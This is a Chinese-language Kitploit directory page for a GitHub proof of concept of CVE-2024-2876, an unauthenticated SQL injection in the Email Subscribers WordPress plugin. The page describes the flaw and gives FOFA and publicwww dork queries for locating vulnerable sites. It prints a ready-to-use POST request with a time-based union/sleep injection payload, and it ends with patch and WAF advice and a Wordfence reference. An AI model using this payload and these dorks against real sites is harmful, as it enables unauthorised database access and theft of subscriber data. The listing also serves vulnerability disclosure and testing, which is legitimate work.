Skip to content
KitploitKITPLOIT
工具漏洞利用博客
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-2876 — CVE-2024-2876 的概念验证,Email Subscribers WordPress 插件中的未认证 SQL 注入,包含 dork 查询和可用的利用请求。 | Kitploit
工具/GitHubGitHub/babydessy/cve-2024-2876
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubbabydessy/cve-2024-2876

CVE-2024-2876

CVE-2024-2876 的概念验证,Email Subscribers WordPress 插件中的未认证 SQL 注入,包含 dork 查询和可用的利用请求。

查看仓库
112年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-2876

#漏洞描述: WordPress 的 Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce 插件在所有版本(包括 5.7.14)中,由于对用户提供的参数转义不足以及现有 SQL 查询缺乏充分的预处理,其 ‘IG_ES_Subscribers_Query’ 类的 ‘run’ 函数存在 SQL 注入漏洞。这使得未经身份验证的攻击者能够将额外的 SQL 查询附加到现有查询中,从而可用于从数据库中提取敏感信息。

#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"

#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE

#如何修复? 由于所有版本直至 5.7.14 均被检测出存在该 CVE,建议用户将 Email Subscribers by Icegram Express 插件升级至 5.7.15 版本(或最新版本 5.7.19)。 Patchstack 用户可以选择专门为易受攻击的插件启用自动更新。 部署 WAF/WAAP 解决方案作为额外的防护层。此类解决方案的优势在于,即使该漏洞是新的且未知(0-day),它仍可能通过检测利用模式和技术来阻止攻击。

#资源: https://www.wordfence.com/blog/2024/04/1250-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-email-subscribers-by-icegram-express-wordpress-plugin/

下载工具